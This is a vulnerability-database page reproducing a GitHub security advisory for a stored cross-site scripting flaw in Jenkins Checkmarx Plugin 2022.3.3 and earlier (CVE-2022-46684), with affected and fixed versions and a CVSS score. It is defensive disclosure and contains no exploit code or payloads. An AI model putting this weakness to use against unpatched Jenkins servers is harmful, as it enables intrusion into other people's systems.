Loading HuntDB...
Hunt
Vulnerability Intelligence by wss.sh
Home Daily Briefings High Impact CVEs Recent Exploits KEV Catalog GitHub Advisories Latest Updates Security News
Sign In Sign Up

GHSA-p86x-75j8-w4xh

GitHub Security Advisory

Stored XSS vulnerability in Jenkins Checkmarx Plugin

✓ GitHub Reviewed HIGH Has CVE
View on GitHub

Advisory Details

heckmarx Plugin processes Checkmarx service API responses and generates HTML reports from them for rendering on the Jenkins UI.

Checkmarx Plugin 2022.3.3 and earlier does not escape values returned from the Checkmarx service API before inserting them into HTML reports. This results in a stored cross-site scripting (XSS) vulnerability.

While Jenkins users without Overall/Administer permission are not allowed to configure the URL to the Checkmarx service, this could still be exploited via man-in-the-middle attacks.

Checkmarx Plugin 2022.4.3 escapes values returned from the Checkmarx service API before inserting them into HTML reports.

Affected Packages

Maven com.checkmarx.jenkins:checkmarx
Affected versions: 0 (fixed in 2022.4.3)

Related CVEs

CVE-2022-46684

Key Information

GHSA ID
GHSA-p86x-75j8-w4xh
Published
December 12, 2022 9:30 AM
Last Modified
December 16, 2022 11:00 PM
CVSS Score
7.5 /10
Primary Ecosystem
Maven
Primary Package
com.checkmarx.jenkins:checkmarx
GitHub Reviewed
✓ Yes

Dataset

Last updated: July 5, 2025 6:26 AM

Data from GitHub Advisory Database. This information is provided for research and educational purposes.